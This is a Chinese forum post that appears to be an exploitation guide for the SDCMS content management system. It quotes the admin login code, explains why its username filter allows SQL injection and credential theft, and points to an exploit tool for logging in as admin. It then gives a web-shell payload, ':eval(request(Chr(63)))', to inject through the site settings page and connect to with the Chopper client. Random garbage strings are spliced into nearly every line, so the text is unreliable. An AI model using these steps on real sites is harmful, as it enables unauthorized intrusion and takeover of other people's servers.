作者:T00LS 鬼哥
" y& [/ `: A9 \# M& ^1 o, L漏洞文件:后台目录/index.asp+ W" R2 Y/ k5 a) Q$ V6 h: s! J
Z' V7 r. X* Y: O: F& t0 u
Sub Check" w3 g5 j! k2 l" l$ X
Dim username,password,code,getcode,Rs
6 I3 n* D6 v' _4 w IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
0 g! d8 b( b `- ~6 e" c. w username=FilterText(Trim(Request.Form("username")),1)/ `' W2 h+ W+ q6 b
password=FilterText(Trim(Request.Form("password")),1)
9 H7 D! ^ |) ?* N. v& K4 i code=Trim(Request.Form("yzm"))
8 U8 ?/ W* g# S; ~! y getcode=Session("SDCMSCode")% h4 O B5 K/ i8 G
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
: ^' Z$ |5 o( R+ \+ ]- o IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
" }$ A; M/ t& ^2 _2 M$ r0 a IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied3 i% g3 J% z" ^* n8 ~) ]) q
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied
% E2 {/ \$ L, g, h9 _& F' P IF username="" or password="" Then. U9 e1 N/ o7 U0 x7 U2 R0 c
Echo "用户名或密码不能为空" ied
( r, z$ n! f/ k" F7 P3 p Else
- b- \8 p* [0 X9 S7 ^ Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
* y) R+ _2 i% t: `) ~0 o o IF Rs.Eof Then! g ~. n% [8 R3 J' E. k
AddLog username,GetIp,"登录失败",1
$ D; o" f) A/ E2 y+ } Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
3 j: w1 e$ H7 A. m! R4 O2 ? Else
1 f' ^7 h, }, C& G* J$ u/ a Add_Cookies "sdcms_id",Rs(0)
. I% W: ^. r; n y Add_Cookies "sdcms_name",username* `3 N5 Z5 y3 i
Add_Cookies "sdcms_pwd",Rs(2)
2 [- V" C7 x# y Add_Cookies "sdcms_admin",Rs(3)
2 L, n3 G' ?9 M0 m0 n Add_Cookies "sdcms_alllever",Rs(4)
2 z; r/ _! U6 A/ u5 H: T8 g# f" u/ v9 U8 m Add_Cookies "sdcms_infolever",Rs(5)1 O P0 O) s' Y5 ?
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")- e: {, t ~8 @
AddLog username,GetIp,"登录成功",1, c, K$ x: }" D+ ^: O1 M
'自动删除30天前的Log记录6 b# ]) Z/ F( t* {
IF Sdcms_DataType Then% t% q' J3 Y: L6 a% T6 P
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
( X# q! I* U/ P: a, } Else2 G( \2 z4 }% o8 }/ _, N2 Y, L
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
+ j0 S" p: `& ~7 w End IF
0 O+ p+ I! [& B& P8 Q3 y$ m1 N Go("sdcms_index.asp"); `6 }# I m7 ?. m
End IF
. m" V* S! ?! U+ Z Rs.Close S, j! }% Y" }# t
Set Rs=Nothing
1 w& ?- j* w9 ]$ s, `+ s/ j o) Y End IF! L, q% j; _. ~1 t9 F6 ~9 C! @
End Sub5 t. ^/ C$ O/ I- }
8 G, _: j% C3 T+ ` O
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
2 ?' v: a7 Y( E% r5 e% B: E0 U) | r$ |2 m- }8 G
Function FilterText(ByVal t0,ByVal t1)
7 q% C/ g5 J4 q" y$ [ IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function) s4 `: J( s, I) X: k' Y
t0=Trim(t0); e1 y9 s$ {6 E
Select Case t1) d3 X9 |! H; l* m% W% V
Case "1"( C' Z* D7 p1 d: X
t0=Replace(t0,Chr(32),"")
/ W9 Q. H4 T% S% I t0=Replace(t0,Chr(13),"")
A5 R* g8 C( d t0=Replace(t0,Chr(10)&Chr(10),"")
. B; [, i$ X# B5 J1 W7 M t0=Replace(t0,Chr(10),"")
! L5 @* C2 [, x- C- x! ] Case "2"* ?6 O. G& I0 u- ~3 ?9 w7 \1 l
t0=Replace(t0,Chr(8),"")'回格
7 T% G+ C5 ^8 P. d# r+ X; O t0=Replace(t0,Chr(9),"")'tab(水平制表符)% h# Q5 i f0 }- h; H1 M/ w7 \. x
t0=Replace(t0,Chr(10),"")'换行; h5 a" N) v1 w$ i9 u" Y2 ]
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)1 x9 B' V. M4 U+ p
t0=Replace(t0,Chr(12),"")'换页5 \$ b2 B! }8 X8 }7 O
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
* L z% }% y" u2 n. Y t0=Replace(t0,Chr(22),"")4 a, ^: y/ {9 \: i$ V
t0=Replace(t0,Chr(32),"")'空格 SPACE
4 c! @* T% }0 z& K. Y1 q2 m0 k t0=Replace(t0,Chr(33),"")'!! Q$ e4 j* L! a: [0 [! I5 a
t0=Replace(t0,Chr(34),"")'"8 v2 ~% c) ]# l: I6 P" x* y+ Y
t0=Replace(t0,Chr(35),"")'#
9 L2 g, Q+ W! B% D% @ t0=Replace(t0,Chr(36),"")'$+ d s% o. Y" i1 D7 i0 [& `
t0=Replace(t0,Chr(37),"")'%
- B9 a3 W* y* T6 j1 ~4 Y) R t0=Replace(t0,Chr(38),"")'&
$ Z1 U3 R) t! E, T+ O t0=Replace(t0,Chr(39),"")''" Q$ t9 J. h3 l
t0=Replace(t0,Chr(40),"")'( K I! o% S6 S1 M" H7 f& t$ E
t0=Replace(t0,Chr(41),"")')/ G! O# \: D( }* i) u+ g# W
t0=Replace(t0,Chr(42),"")'*2 T/ i) J2 q, e2 l- M8 W9 ~) g* y
t0=Replace(t0,Chr(43),"")'+
. P" ]3 ?9 ?- _& D. t- A- j6 p t0=Replace(t0,Chr(44),"")',2 o( i5 q! Y2 Q4 b8 N. {1 w' B
t0=Replace(t0,Chr(45),"")'-
6 [# _; O' u ^7 K t0=Replace(t0,Chr(46),"")'.$ d; V& S* P } P: N6 ^ h3 O4 F
t0=Replace(t0,Chr(47),"")'/# B9 C1 e1 J2 u& O/ r: D- v0 l
t0=Replace(t0,Chr(58),"")':3 p6 L: a; i" n
t0=Replace(t0,Chr(59),"")';
. |" W) u: s* o6 ^" K# m- A+ \& I9 i t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
" u1 {1 m% {: B O' Y9 ^' _ t0=Replace(t0,Chr(63),"")'?0 Q! Q! {* b; K8 o. G5 X
t0=Replace(t0,Chr(64),"")'@
, ^% W# `/ j" W" \+ C" X7 w# o t0=Replace(t0,Chr(91),"")'\3 q6 b$ I% c3 ?; S. k1 d
t0=Replace(t0,Chr(92),"")'\
( p6 E7 D# S' o8 |5 ? t0=Replace(t0,Chr(93),"")']
6 p) L8 i( M! a- U9 O' @4 e0 \ t0=Replace(t0,Chr(94),"")'^+ i1 @. Z0 D# H2 k- z
t0=Replace(t0,Chr(95),"")'_3 ^7 y/ \* R+ y- a7 Y H4 \# z
t0=Replace(t0,Chr(96),"")'`9 ~0 c, G. S+ A9 M- ~
t0=Replace(t0,Chr(123),"")'{
2 N9 f. Y+ M0 e. m t0=Replace(t0,Chr(124),"")'|5 s& p; c! p5 f; W" x: e0 t/ V
t0=Replace(t0,Chr(125),"")'}4 S; S' _0 ~9 x8 E( Q7 w
t0=Replace(t0,Chr(126),"")'~
# k' w* F( y5 {' q. B. R( t- d0 W Case Else) p9 j2 {, H/ |# ]# a/ W
t0=Replace(t0, "&", "&")
/ d$ E6 l5 C. e t0=Replace(t0, "'", "'")& q4 J' A5 P6 B, V2 N" r# U
t0=Replace(t0, """", """)+ ]' i0 N# ?) x
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
! P5 B. l# \9 q5 u v; w$ o End Select9 A5 j( H$ s1 W! ` Q- M) d3 [6 T
IF Instr(Lcase(t0),"expression")>0 Then
4 L0 i: A# K) } t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
9 D8 E1 K5 @' a End If
3 c9 a* F# l8 U, z/ F3 i }3 r/ g FilterText=t0
# `. p5 {- f! {End Function
7 D# q- f: `4 N$ d/ }/ m9 U4 u! O9 F ]4 a2 e5 k: ]" U: A
看到没。直接参数是1 只过滤
4 g9 `2 [9 l7 w6 B, O& \( O; _9 o t0=Replace(t0,Chr(32)," ")4 `% F) [/ D% U4 C' M
t0=Replace(t0,Chr(13),"")
1 o% T! s) n+ o5 ` t0=Replace(t0,Chr(10)&Chr(10),"5 |0 G! G% A! _9 _8 @' y
")# p. P0 f& q7 h$ g# X1 r
t0=Replace(t0,Chr(10),"( p- B$ l! d$ K! ^/ C' |" `7 h
")
N/ Q$ F2 m7 ^漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
w% ^- }& ^ v- I1 bEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP5 J; W4 z+ O3 v
6 x/ N* F1 }, P# G0 U' i$ C$ c7 s: C测试:
2 U2 K4 |8 y3 o$ {0 z/ A/ ~/ _: Y) b6 s: C
7 w Y; \; ^. g: v
现在输入工具上验证码,然后点OK
# ~ v9 g5 K1 g& i: D. e- F
0 Z" L: C3 t4 p7 e- d9 ]. {. k2 w
2 E n, O6 a- Q5 q) V/ z% j看到我们直接进入后台管理界面了,呵呵!
2 J$ S3 s. }/ r, j. e; L
- M1 `- X1 {' k( @+ c# {) Z9 n* @% W
8 `. C% ^3 I1 ]' V
这样直接进入后台了。。。。
9 N; F9 m4 o9 d# V6 x: M1 @6 G: P# N7 W4 }* a3 J* G# x% q
1 i; u1 X) t, u4 H
7 q' c) z7 M2 d' E6 r! F9 K2 z( h
SDCMS提权:, w' ~# z6 l9 ]# u- N9 O3 q# w
5 R' q7 n+ d9 n, {1 i
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
X4 x( Y) K/ X$ Q* u
2 l0 C% U, b# G
! T' ~6 ?9 V9 O$ ~
+ D" y0 Y7 `- Y$ S) M* Q! c5 tOK,现在用菜刀连接下!
* x' a) r7 i. V0 T& z7 R7 _. Z3 T6 u8 K: x6 V5 D; i& j7 u
0 C Y% {. w; J0 l7 ]
4 i3 \+ o2 C) o K0 g* p
' S9 G/ I. N8 c
( N+ k4 h; V) h5 v6 a& F p! I' j' L |